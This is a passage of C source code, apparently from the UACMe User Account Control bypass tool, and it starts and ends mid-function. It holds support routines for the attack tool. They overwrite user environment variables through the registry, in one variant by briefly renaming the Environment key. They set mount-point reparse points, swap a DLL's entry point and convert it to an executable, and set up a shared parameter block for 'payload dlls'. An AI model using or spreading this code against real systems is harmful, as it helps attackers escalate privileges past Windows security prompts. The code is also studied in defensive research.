NULL,\n                NULL, NULL, &ftWrite);\n\n        } while (lResult == ERROR_SUCCESS);\n    }\n\n    lpEnd--;\n    *lpEnd = TEXT('\\0');\n\n    RegCloseKey(hKey);\n\n    //\n    // Delete current key, all its subkeys should already be removed.\n    //\n    lResult = RegDeleteKey(hKeyRoot, lpSubKey);\n    if (lResult == ERROR_SUCCESS)\n        return TRUE;\n\n    return FALSE;\n}\n\n/*\n* supRegDeleteKeyRecursive\n*\n* Purpose:\n*\n* Delete key and all its subkeys/values.\n*\n* Remark:\n*\n* SubKey should not be longer than 260 chars.\n*\n*/\nBOOL supRegDeleteKeyRecursive(\n    _In_ HKEY hKeyRoot,\n    _In_ LPCWSTR lpSubKey)\n{\n    WCHAR szKeyName[MAX_PATH * 2];\n    RtlSecureZeroMemory(szKeyName, sizeof(szKeyName));\n    _strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH);\n    return supxDeleteKeyRecursive(hKeyRoot, szKeyName);\n}\n\n/*\n* supSetEnvVariableEx\n*\n* Purpose:\n*\n* Remove or set current user environment variable (NTAPI 
variant).\n*\n*/\nBOOL supSetEnvVariableEx(\n    _In_ BOOL fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData\n)\n{\n    BOOL        bNameAllocated = FALSE;\n    DWORD       cbData;\n    NTSTATUS    ntStatus = STATUS_UNSUCCESSFUL;\n    LPWSTR      lpSubKey;\n    HANDLE      hRoot = NULL, hSubKey = NULL;\n\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING usRootKey, usSubKey, usValueName;\n\n    usRootKey.Buffer = NULL;\n\n    do {\n        if (lpVariableName == NULL) {\n            //\n            // Nothing to set/remove.\n            //\n            break;\n        }\n\n        if ((lpVariableData == NULL) && (fRemove == FALSE))\n            break;\n\n        if (lpKeyName == NULL)\n            lpSubKey = L\"Environment\";\n        else\n            lpSubKey = lpKeyName;\n\n        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        bNameAllocated = TRUE;\n\n        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RtlInitUnicodeString(&usSubKey, lpSubKey);\n        obja.RootDirectory = hRoot;\n        obja.ObjectName = &usSubKey;\n        ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RtlInitUnicodeString(&usValueName, lpVariableName);\n\n        if (fRemove) {\n\n            ntStatus = NtDeleteValueKey(hSubKey, &usValueName);\n\n        }\n        else {\n\n            cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n\n            ntStatus = NtSetValueKey(hSubKey,\n                &usValueName,\n                0,\n                REG_SZ,\n                (BYTE*)lpVariableData,\n                cbData);\n\n        }\n\n        if (NT_SUCCESS(ntStatus)) {\n\n            
SendMessageTimeout(HWND_BROADCAST,\n                WM_SETTINGCHANGE,\n                0,\n                (LPARAM)lpVariableName,\n                SMTO_BLOCK,\n                1000,\n                NULL);\n\n        }\n\n    } while (FALSE);\n\n    if (hSubKey) NtClose(hSubKey);\n    if (hRoot) NtClose(hRoot);\n    if (bNameAllocated)\n        RtlFreeUnicodeString(&usRootKey);\n\n    return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supSetEnvVariable\n*\n* Purpose:\n*\n* Remove or set current user environment variable.\n*\n*/\nBOOL supSetEnvVariable(\n    _In_ BOOL fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData\n)\n{\n    BOOL    bResult = FALSE;\n    HKEY    hKey = NULL;\n    DWORD   cbData;\n\n    LPWSTR lpSubKey;\n\n    do {\n        if (lpVariableName == NULL)\n            break;\n\n        if (lpKeyName == NULL)\n            lpSubKey = L\"Environment\";\n        else\n            lpSubKey = lpKeyName;\n\n        if ((lpVariableData == NULL) && (fRemove == FALSE))\n            break;\n\n        if (RegOpenKey(HKEY_CURRENT_USER, lpSubKey, &hKey) != ERROR_SUCCESS)\n            break;\n\n        if (fRemove) {\n            bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);\n        }\n        else {\n            cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n            bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,\n                (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);\n\n        }\n\n        if (bResult) {\n            SendMessageTimeout(HWND_BROADCAST,\n                WM_SETTINGCHANGE,\n                0,\n                (LPARAM)lpVariableName,\n                SMTO_BLOCK,\n                1000,\n                NULL);\n        }\n\n    } while (FALSE);\n\n    if (hKey != NULL) {\n        RegFlushKey(hKey);\n        RegCloseKey(hKey);\n    }\n\n    return bResult;\n}\n\n/*\n* supSetEnvVariable2\n*\n* Purpose:\n*\n* Remove or set current user 
environment variable.\n*\n*/\nBOOL supSetEnvVariable2(\n    _In_ BOOL fRemove,\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPCWSTR lpVariableName,\n    _In_opt_ LPCWSTR lpVariableData\n)\n{\n    BOOL    bResult = FALSE;\n    HKEY    hKey = NULL;\n    DWORD   cbData;\n\n    LPWSTR lpSubKey;\n\n    LARGE_INTEGER liValue;\n    ULONG seedValue;\n    WCHAR szNewKey[MAX_PATH];\n\n    do {\n        if (lpVariableName == NULL)\n            break;\n\n        if (lpKeyName == NULL)\n            lpSubKey = L\"Environment\";\n        else\n            lpSubKey = lpKeyName;\n\n        if ((lpVariableData == NULL) && (fRemove == FALSE))\n            break;\n\n        RtlSecureZeroMemory(&szNewKey, sizeof(szNewKey));\n        seedValue = GetTickCount();\n        liValue.LowPart = RtlRandomEx(&seedValue);\n        seedValue = ~GetTickCount();\n        liValue.HighPart = RtlRandomEx(&seedValue);\n\n        supBinTextEncode(liValue.QuadPart, szNewKey);\n\n        if (ERROR_SUCCESS == RegRenameKey(HKEY_CURRENT_USER, lpSubKey, szNewKey)) {\n\n            if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, szNewKey, &hKey)) {\n\n                if (fRemove) {\n                    bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);\n                }\n                else {\n                    cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n                    bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,\n                        (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);\n\n\n                }\n\n                RegFlushKey(hKey);\n                RegCloseKey(hKey);\n                hKey = NULL;\n\n            }\n\n            RegRenameKey(HKEY_CURRENT_USER, szNewKey, lpSubKey);\n        }\n\n        if (bResult) {\n            SendMessageTimeout(HWND_BROADCAST,\n                WM_SETTINGCHANGE,\n                0,\n                (LPARAM)lpVariableName,\n                SMTO_BLOCK,\n                1000,\n                NULL);\n     
   }\n\n    } while (FALSE);\n\n    if (hKey != NULL) {\n        RegFlushKey(hKey);\n        RegCloseKey(hKey);\n    }\n\n    return bResult;\n}\n\n/*\n* supReplaceEnvironmentVariableValue\n*\n* Purpose:\n*\n* Replace/Restore environment variable value.\n*\n*/\n_Success_(return)\nBOOL supReplaceEnvironmentVariableValue(\n    _In_opt_ LPWSTR lpKeyName,\n    _In_ LPWSTR lpVariableName,\n    _In_ DWORD dwType,\n    _In_opt_ LPWSTR lpVariableData,\n    _Out_opt_ PVOID *lpOldVariableData\n)\n{\n    BOOL        bNameAllocated = FALSE, bDoBackup = (lpOldVariableData != NULL);\n    DWORD       cbData;\n    NTSTATUS    ntStatus = STATUS_UNSUCCESSFUL;\n    LPWSTR      lpSubKey;\n    HANDLE      hRoot = NULL, hSubKey = NULL;\n\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING usRootKey, usSubKey, usValueName;\n\n    usRootKey.Buffer = NULL;\n\n    do {\n        if (lpVariableName == NULL) {\n            //\n            // Nothing to replace.\n            //\n            break;\n        }\n\n        if (lpVariableData == NULL)\n            break;\n\n        if (lpKeyName == NULL)\n            lpSubKey = L\"Environment\";\n        else\n            lpSubKey = lpKeyName;\n\n        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        bNameAllocated = TRUE;\n\n        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RtlInitUnicodeString(&usSubKey, lpSubKey);\n        obja.RootDirectory = hRoot;\n        obja.ObjectName = &usSubKey;\n        ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RtlInitUnicodeString(&usValueName, lpVariableName);\n\n\n        if (bDoBackup) {\n\n            cbData = 0;\n\n            //\n            // Read value, failure is not critical, value may not be 
present.\n            //\n            supRegReadValue(hSubKey,\n                lpVariableName,\n                dwType,\n                lpOldVariableData,\n                &cbData,\n                g_ctx->ucmHeap);\n\n        }\n\n        cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));\n\n        ntStatus = NtSetValueKey(hSubKey,\n            &usValueName,\n            0,\n            dwType,\n            (BYTE*)lpVariableData,\n            cbData);\n\n        if (NT_SUCCESS(ntStatus)) {\n\n            SendMessageTimeout(HWND_BROADCAST,\n                WM_SETTINGCHANGE,\n                0,\n                (LPARAM)lpVariableName,\n                SMTO_BLOCK,\n                1000,\n                NULL);\n\n        }\n\n    } while (FALSE);\n\n    if (hSubKey) NtClose(hSubKey);\n    if (hRoot) NtClose(hRoot);\n    if (bNameAllocated)\n        RtlFreeUnicodeString(&usRootKey);\n\n    return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supDeleteMountPoint\n*\n* Purpose:\n*\n* Removes reparse point of type mount_point.\n*\n*/\nBOOL supDeleteMountPoint(\n    _In_ HANDLE hDirectory\n)\n{\n    NTSTATUS        status;\n    IO_STATUS_BLOCK IoStatusBlock;\n\n    REPARSE_GUID_DATA_BUFFER Buffer;\n\n    RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));\n    Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\n\n    status = NtFsControlFile(hDirectory,\n        NULL,\n        NULL,\n        NULL,\n        &IoStatusBlock,\n        FSCTL_DELETE_REPARSE_POINT,\n        &Buffer,\n        REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,\n        NULL,\n        0);\n\n    if (status == STATUS_NOT_A_REPARSE_POINT) {\n        SetLastError(ERROR_INVALID_PARAMETER);\n    }\n    else {\n        supSetLastErrorFromNtStatus(status);\n    }\n\n    return NT_SUCCESS(status);\n}\n\n/*\n* supSetMountPoint\n*\n* Purpose:\n*\n* Install reparse point of type mount_point to target.\n*\n*/\nBOOL supSetMountPoint(\n    _In_ HANDLE hDirectory,\n    _In_ LPCWSTR lpTarget,\n    _In_ LPCWSTR 
lpPrintName\n)\n{\n    ULONG           memIO;\n    USHORT          cbTarget, cbPrintName, reparseDataLength;\n    NTSTATUS        status;\n    IO_STATUS_BLOCK IoStatusBlock;\n\n    REPARSE_DATA_BUFFER* Buffer;\n\n    if ((lpTarget == NULL) || (lpPrintName == NULL)) {\n        SetLastError(ERROR_INVALID_PARAMETER);\n        return FALSE;\n    }\n\n    //\n    // Calculate required buffer size.\n    // Header + length of input strings + safe space.\n    //\n    cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));\n    cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));\n\n    reparseDataLength = cbTarget + cbPrintName + 12;\n    memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);\n\n    Buffer = (REPARSE_DATA_BUFFER*)supHeapAlloc((SIZE_T)memIO);\n    if (Buffer == NULL)\n        return FALSE;\n\n    //\n    // Setup reparse point structure.\n    //\n    Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\n    Buffer->ReparseDataLength = reparseDataLength;\n\n    //\n    // Add Target to PathBuffer.\n    //\n    Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;\n    Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;\n\n    RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,\n        lpTarget,\n        cbTarget);\n\n    //\n    // Add PrintName to PathBuffer.\n    //\n    Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);\n    Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;\n\n    RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],\n        lpPrintName,\n        cbPrintName);\n\n    //\n    // Set reparse point.\n    //\n    status = NtFsControlFile(hDirectory,\n        NULL,\n        NULL,\n        NULL,\n        &IoStatusBlock,\n        FSCTL_SET_REPARSE_POINT,\n        Buffer,\n        memIO,\n        NULL,\n        0);\n\n    supHeapFree(Buffer);\n\n    supSetLastErrorFromNtStatus(status);\n    return 
NT_SUCCESS(status);\n}\n\n/*\n* supOpenDirectoryForReparse\n*\n* Purpose:\n*\n* Open directory handle to set reparse point.\n*\n*/\nHANDLE supOpenDirectoryForReparse(\n    _In_ LPCWSTR lpDirectory\n)\n{\n    NTSTATUS            status = STATUS_UNSUCCESSFUL;\n    HANDLE              hReparseDirectory = NULL;\n    UNICODE_STRING      usReparseDirectory;\n    IO_STATUS_BLOCK     IoStatusBlock;\n    OBJECT_ATTRIBUTES   ObjectAttributes;\n\n    usReparseDirectory.Buffer = NULL;\n    if (RtlDosPathNameToNtPathName_U(lpDirectory, &usReparseDirectory, NULL, NULL)) {\n\n        InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        status = NtCreateFile(&hReparseDirectory,\n            FILE_ALL_ACCESS,\n            &ObjectAttributes,\n            &IoStatusBlock,\n            NULL,\n            0,\n            FILE_SHARE_READ | FILE_SHARE_WRITE,\n            FILE_OPEN,\n            FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,\n            NULL,\n            0);\n\n        RtlFreeUnicodeString(&usReparseDirectory);\n    }\n\n    supSetLastErrorFromNtStatus(status);\n\n    return hReparseDirectory;\n}\n\n/*\n* supWinstationToName\n*\n* Purpose:\n*\n* Retrieves winstation string name.\n*\n*/\nBOOL supWinstationToName(\n    _In_opt_ HWINSTA hWinsta,\n    _In_ LPWSTR lpBuffer,\n    _In_ DWORD cbBuffer,\n    _Out_ PDWORD BytesNeeded\n)\n{\n    HWINSTA hObject;\n\n    if (hWinsta == NULL)\n        hObject = GetProcessWindowStation();\n    else\n        hObject = hWinsta;\n\n    return GetUserObjectInformation(\n        hObject,\n        UOI_NAME,\n        lpBuffer,\n        cbBuffer,\n        BytesNeeded);\n}\n\n/*\n* supDesktopToName\n*\n* Purpose:\n*\n* Retrieves desktop string name.\n*\n*/\nBOOL supDesktopToName(\n    _In_opt_ HDESK hDesktop,\n    _In_ LPWSTR lpBuffer,\n    _In_ DWORD cbBuffer,\n    _Out_ PDWORD BytesNeeded\n)\n{\n    HDESK hObject;\n\n    if (hDesktop == NULL)\n        hObject = 
GetThreadDesktop(GetCurrentThreadId());\n    else\n        hObject = hDesktop;\n\n    return GetUserObjectInformation(\n        hObject,\n        UOI_NAME,\n        lpBuffer,\n        cbBuffer,\n        BytesNeeded);\n}\n\n/*\n* supReplaceDllEntryPoint\n*\n* Purpose:\n*\n* Replace DLL entry point and optionally convert dll to exe.\n*\n*/\nBOOL supReplaceDllEntryPoint(\n    _In_ PVOID DllImage,\n    _In_ ULONG SizeOfDllImage,\n    _In_ LPCSTR lpEntryPointName,\n    _In_ BOOL fConvertToExe\n)\n{\n    BOOL bResult = FALSE;\n    PIMAGE_NT_HEADERS NtHeaders;\n    DWORD DllVirtualSize;\n    PVOID DllBase, EntryPoint;\n\n    NtHeaders = RtlImageNtHeader(DllImage);\n    if (NtHeaders) {\n\n        DllVirtualSize = 0;\n        DllBase = PELoaderLoadImage(DllImage, &DllVirtualSize);\n        if (DllBase) {\n            //\n            // Get the new entrypoint.\n            //\n            EntryPoint = PELoaderGetProcAddress(DllBase, (PCHAR)lpEntryPointName);\n            if (EntryPoint) {\n                //\n                // Set new entrypoint and recalculate checksum.\n                //\n                NtHeaders->OptionalHeader.AddressOfEntryPoint =\n                    (ULONG)((ULONG_PTR)EntryPoint - (ULONG_PTR)DllBase);\n\n                if (fConvertToExe)\n                    NtHeaders->FileHeader.Characteristics &= ~IMAGE_FILE_DLL;\n\n                NtHeaders->OptionalHeader.CheckSum =\n                    supCalculateCheckSumForMappedFile(DllImage, SizeOfDllImage);\n\n                bResult = TRUE;\n            }\n            VirtualFree(DllBase, 0, MEM_RELEASE);\n        }\n    }\n    return bResult;\n}\n\n/*\n* supQuerySystemRoot\n*\n* Purpose:\n*\n* Query system root value from registry to the program global context.\n*\n*/\nBOOL supQuerySystemRoot(\n    _Inout_ PVOID Context)\n{\n    BOOL                bResult = FALSE, needBackslash = FALSE;\n    NTSTATUS            Status;\n    UNICODE_STRING      UString;\n    OBJECT_ATTRIBUTES   ObjectAttributes;\n\n   
 PWCHAR              lpData = NULL;\n    SIZE_T              ccm = 0, cch = 0;\n    HANDLE              hKey = NULL;\n\n    PUACMECONTEXT       context = (PUACMECONTEXT)Context;\n\n    WCHAR               szBuffer[MAX_PATH];\n    WCHAR               szSystem32Prep[] = { L's', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\\\', 0 };\n\n    ULONG               Length = 0, cbSystem32Prep = sizeof(szSystem32Prep) - sizeof(WCHAR);\n\n    do {\n        _strcpy(szBuffer, T_REGISTRY_PREP);\n        _strcat(szBuffer, T_WINDOWS_CURRENT_VERSION);\n        RtlInitUnicodeString(&UString, szBuffer);\n\n        InitializeObjectAttributes(&ObjectAttributes, &UString, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        Status = NtOpenKey(&hKey, KEY_READ, &ObjectAttributes);\n        if (!NT_SUCCESS(Status))\n            break;\n\n        Status = supRegReadValue(hKey, L\"SystemRoot\", REG_SZ, (PVOID*)&lpData, &Length, context->ucmHeap);\n        if (!NT_SUCCESS(Status) || (lpData == NULL))\n            break;\n\n        cch = _strlen(lpData);\n        if (cch == 0) {\n            SetLastError(ERROR_INVALID_DATA);\n            break;\n        }\n\n        needBackslash = (lpData[cch - 1] != L'\\\\');\n        ccm = cch + (needBackslash ? 
1 : 0) + (cbSystem32Prep / sizeof(WCHAR));\n\n        if (ccm >= MAX_PATH) {\n            SetLastError(ERROR_BUFFER_OVERFLOW);\n            break;\n        }\n\n        _strncpy(context->szSystemRoot, MAX_PATH, lpData, cch + 1);\n        if (needBackslash) {\n            context->szSystemRoot[cch] = L'\\\\';\n            context->szSystemRoot[cch + 1] = UNICODE_NULL;\n        }\n\n        _strcpy(context->szSystemDirectory, context->szSystemRoot);\n        _strcat(context->szSystemDirectory, szSystem32Prep);\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hKey) NtClose(hKey);\n    if (lpData) RtlFreeHeap(context->ucmHeap, 0, lpData);\n\n    return bResult;\n}\n\n#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)\n\n/*\n* supGetSystemInfo\n*\n* Purpose:\n*\n* Returns buffer with system information by given InfoClass.\n*\n* Returned buffer must be freed with supHeapFree after usage.\n*\n*/\nPVOID supGetSystemInfo(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass\n)\n{\n    PVOID       buffer = NULL;\n    ULONG       bufferSize = PAGE_SIZE;\n    NTSTATUS    ntStatus;\n    ULONG       returnedLength = 0;\n\n    buffer = supHeapAlloc((SIZE_T)bufferSize);\n    if (buffer == NULL)\n        return NULL;\n\n    while ((ntStatus = NtQuerySystemInformation(\n        SystemInformationClass,\n        buffer,\n        bufferSize,\n        &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)\n    {\n        supHeapFree(buffer);\n        bufferSize *= 2;\n\n        if (bufferSize > SI_MAX_BUFFER_LENGTH)\n            return NULL;\n\n        buffer = supHeapAlloc((SIZE_T)bufferSize);\n        if (buffer == NULL)\n            return NULL;\n    }\n\n    if (NT_SUCCESS(ntStatus)) {\n        return buffer;\n    }\n\n    if (buffer)\n        supHeapFree(buffer);\n\n    return NULL;\n}\n\n/*\n* supIsCorImageFile\n*\n* Purpose:\n*\n* Return true if image has CliHeader entry, false otherwise.\n*\n*/\nBOOL supIsCorImageFile(\n    _In_ PVOID ImageBase\n)\n{\n    ULONG        
       sz = 0;\n    IMAGE_COR20_HEADER* CliHeader;\n\n    CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n    return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));\n}\n\n/*\n* supCreateDirectory\n*\n* Purpose:\n*\n* Native create directory.\n*\n*/\nNTSTATUS supCreateDirectory(\n    _Out_opt_ PHANDLE phDirectory,\n    _In_ OBJECT_ATTRIBUTES* ObjectAttributes,\n    _In_ ULONG DirectoryShareFlags,\n    _In_ ULONG DirectoryAttributes\n)\n{\n    NTSTATUS         status;\n    HANDLE           DirectoryHandle = NULL;\n    IO_STATUS_BLOCK  IoStatusBlock;\n\n    if (DirectoryAttributes == 0)\n        DirectoryAttributes = FILE_ATTRIBUTE_NORMAL;\n\n    status = NtCreateFile(\n        &DirectoryHandle,\n        FILE_GENERIC_WRITE,\n        ObjectAttributes,\n        &IoStatusBlock,\n        NULL,\n        DirectoryAttributes,\n        DirectoryShareFlags,\n        FILE_OPEN_IF,\n        FILE_DIRECTORY_FILE,\n        NULL,\n        0);\n\n    if (NT_SUCCESS(status)) {\n        if (phDirectory)\n            *phDirectory = DirectoryHandle;\n    }\n    return status;\n}\n\n/*\n* supxCreateBoundaryDescriptorSID\n*\n* Purpose:\n*\n* Create special SID to access isolated namespace.\n*\n*/\nPSID supxCreateBoundaryDescriptorSID(\n    SID_IDENTIFIER_AUTHORITY* SidAuthority,\n    UCHAR SubAuthorityCount,\n    ULONG* SubAuthorities\n)\n{\n    BOOL    bResult = FALSE;\n    ULONG   i;\n    PSID    pSid = NULL;\n\n    do {\n\n        pSid = supHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));\n        if (pSid == NULL)\n            break;\n\n        if (!NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount)))\n            break;\n\n        for (i = 0; i < SubAuthorityCount; i++)\n            *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (bResult == FALSE) {\n        if (pSid) supHeapFree(pSid);\n        pSid = 
NULL;\n    }\n\n    return pSid;\n}\n\n/*\n* supCreateSharedParametersBlock\n*\n* Purpose:\n*\n* Create parameters block to be shared with payload dlls.\n*\n*/\nBOOL supCreateSharedParametersBlock(\n    _In_ PVOID ucmContext)\n{\n    BOOL    bResult = FALSE;\n    ULONG   r;\n    HANDLE  hBoundary = NULL;\n    PVOID   SharedBuffer = NULL;\n    SIZE_T  ViewSize;\n\n    PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;\n\n    LARGE_INTEGER liSectionSize;\n    PSID pWorldSid = NULL;\n\n    SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;\n\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);\n\n    UACME_PARAM_BLOCK ParamBlock;\n\n    ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID };\n\n    WCHAR szBoundaryDescriptorName[128];\n    WCHAR szObjectName[128];\n\n    RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));\n    supGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);\n    RtlInitUnicodeString(&usName, szBoundaryDescriptorName);\n\n    //\n    // Fill parameters block.\n    // \n    RtlSecureZeroMemory(&ParamBlock, sizeof(ParamBlock));\n\n    if (context->OptionalParameterLength != 0) {\n        _strncpy(ParamBlock.szParameter, MAX_PATH,\n            context->szOptionalParameter, MAX_PATH);\n    }\n\n    ParamBlock.AkagiFlag = context->AkagiFlag;\n    ParamBlock.SessionId = NtCurrentPeb()->SessionId;\n\n    supWinstationToName(NULL, ParamBlock.szWinstation, MAX_PATH * 2, &r);\n    supDesktopToName(NULL, ParamBlock.szDesktop, MAX_PATH * 2, &r);\n\n    do {\n        //\n        // Create and assign boundary descriptor.\n        //\n        hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);\n        if (hBoundary == NULL)\n            break;\n\n        pWorldSid = supxCreateBoundaryDescriptorSID(\n            &SidWorldAuthority,\n            1,\n            SubAuthoritiesWorld);\n        if (pWorldSid == NULL)\n    
        break;\n\n        if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {\n            break;\n        }\n\n        //\n        // Create private namespace.\n        //\n        if (!NT_SUCCESS(NtCreatePrivateNamespace(\n            &context->SharedContext.hIsolatedNamespace,\n            MAXIMUM_ALLOWED,\n            &obja,\n            hBoundary)))\n        {\n            break;\n        }\n\n        obja.Attributes = OBJ_CASE_INSENSITIVE;\n        obja.RootDirectory = context->SharedContext.hIsolatedNamespace;\n        obja.ObjectName = &usName;\n\n        //\n        // Create completion event.\n        //\n        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n        supGenerateSharedObjectName((WORD)AKAGI_COMPLETION_EVENT_ID, szObjectName);\n        RtlInitUnicodeString(&usName, szObjectName);\n        _strcpy(ParamBlock.szSignalObject, szObjectName);\n\n        //\n        // Param block is complete. Calc crc32.\n        //\n        ParamBlock.Crc32 = RtlComputeCrc32(0, &ParamBlock, sizeof(ParamBlock));\n\n        if (!NT_SUCCESS(NtCreateEvent(\n            &context->SharedContext.hCompletionEvent,\n            EVENT_ALL_ACCESS,\n            &obja,\n            NotificationEvent,\n            FALSE)))\n        {\n            break;\n        }\n\n        //\n        // Create shared section.\n        //\n        liSectionSize.QuadPart = PAGE_SIZE;\n        ViewSize = PAGE_SIZE;\n\n        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n        supGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szObjectName);\n        RtlInitUnicodeString(&usName, szObjectName);\n\n        if (NT_SUCCESS(NtCreateSection(\n            &context->SharedContext.hSharedSection,\n            SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_QUERY,\n            &obja,\n            &liSectionSize,\n            PAGE_READWRITE,\n            SEC_COMMIT,\n            NULL)))\n        {\n            //\n            // Write data to 
shared section.\n            //\n            if (NT_SUCCESS(NtMapViewOfSection(\n                context->SharedContext.hSharedSection,\n                NtCurrentProcess(),\n                &SharedBuffer,\n                0,\n                PAGE_SIZE,\n                NULL,\n                &ViewSize,\n                ViewUnmap,\n                MEM_TOP_DOWN,\n                PAGE_READWRITE)))\n            {\n                RtlSecureZeroMemory(SharedBuffer, PAGE_SIZE);\n                RtlCopyMemory(SharedBuffer, &ParamBlock, sizeof(ParamBlock));\n                NtUnmapViewOfSection(NtCurrentProcess(), SharedBuffer);\n                bResult = TRUE;\n            }\n        }\n\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (pWorldSid)\n        supHeapFree(pWorldSid);\n    if (hBoundary)\n        RtlDeleteBoundaryDescriptor(hBoundary);\n\n    if (bResult == FALSE) {\n        if (context->SharedContext.hIsolatedNamespace) {\n            NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);\n            NtClose(context->SharedContext.hIsolatedNamespace);\n        }\n    }\n\n    return bResult;\n}\n\n/*\n* supDestroySharedParametersBlock\n*\n* Purpose:\n*\n* Free shared resources.\n*\n*/\nVOID supDestroySharedParametersBlock(\n    _In_ PVOID ucmContext)\n{\n    PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;\n\n    if (context->SharedContext.hIsolatedNamespace) {\n\n        if (context->SharedContext.hCompletionEvent)\n            NtClose(context->SharedContext.hCompletionEvent);\n\n        if (context->SharedContext.hSharedSection)\n            NtClose(context->SharedContext.hSharedSection);\n\n        NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);\n        NtClose(context->SharedContext.hIsolatedNamespace);\n    }\n}\n\n/*\n* supCreateUacmeContext\n*\n* Purpose:\n*\n* Allocate and fill program contexts.\n*\n*/\nPVOID supCreateUacmeContext(\n    _In_ ULONG Method,\n    
